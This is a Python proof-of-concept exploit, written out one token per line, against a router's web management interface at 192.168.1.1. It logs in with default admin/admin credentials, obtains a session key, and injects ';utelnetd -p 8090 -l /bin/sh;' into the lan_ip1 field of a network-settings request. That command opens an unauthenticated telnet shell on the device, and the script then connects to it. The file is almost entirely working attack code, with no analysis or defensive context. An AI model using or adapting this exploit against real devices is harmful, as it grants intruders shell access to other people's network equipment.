import
requests
import
os
from
time
import
sleep
server
=
"192.168.1.1"
main_url
=
"http://192.168.1.1:80"
headers
=
{
"User-Agent"
:
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"
,
}
def
login():
s
=
requests.Session()
s.verify
=
False
url
=
main_url
+
"/cgi-bin/Login.asp?User=admin&Pwd=admin&_=1691919162829"
resp
=
s.get(url,headers
=
headers,timeout
=
100
)
print
(resp.text)
def
get_session_key():
s
=
requests.Session()
s.verify
=
False
url
=
main_url
+
"/cgi-bin/get/New_GUI/get_sessionKey.asp"
resp
=
s.get(url,headers
=
headers,timeout
=
100
)
sessionKey
=
resp.text
print
(sessionKey)
return
sessionKey
def
poc(sessionKey
=
None
):
s
=
requests.Session()
s.verify
=
False
cmd
=
b
";utelnetd -p 8090 -l /bin/sh;"
post_data
=
b
"lan_ip1=192.168.1.1"
post_data
+
=
cmd
post_data
+
=
b
"&lan_netmask1=255.255.255.0&lan2_enable=No"
post_data
+
=
b
"&lan_ip2=192.168.2.1&lan_netmask2=255.255.255.0"
post_data
+
=
b
"&lan_dhcp_type=1&lan_dhcp_start=192.168.1.2&lan_dhcp_count=253&lan_dhcp_lease=86400"
post_data
+
=
b
"&lan_dhcp_option60_vendorID=&lan_dhcp_pridns=&lan_dhcp_secdns=&lan_dhcp_relay_server=&upnp_active=Yes"
post_data
+
=
b
"&lan2_active=No&sessionKey="
post_data
+
=
sessionKey.encode(encoding
=
"utf-8"
)
url
=
main_url
+
"/cgi-bin/New_GUI/Set/Network.asp"
s.post(url,data
=
post_data,headers
=
headers,timeout
=
10000
)
print
(resp.text)
if
__name__
=
=
'__main__'
:
print
(
"\n[*] Connection "
,main_url)
login()
print
(
"[*] Getting session key"
)
sessionKey
=
get_session_key()
print
(
"[*] Sending payload"
)
poc(sessionKey
=
sessionKey)
print
(
"[*] Running Telnetd Service"
)
print
(
"[*] Opening Telnet Connection\n"
)
sleep(
3
)
os.system(
'telnet '
+
str
(server)
+
' 8090'
)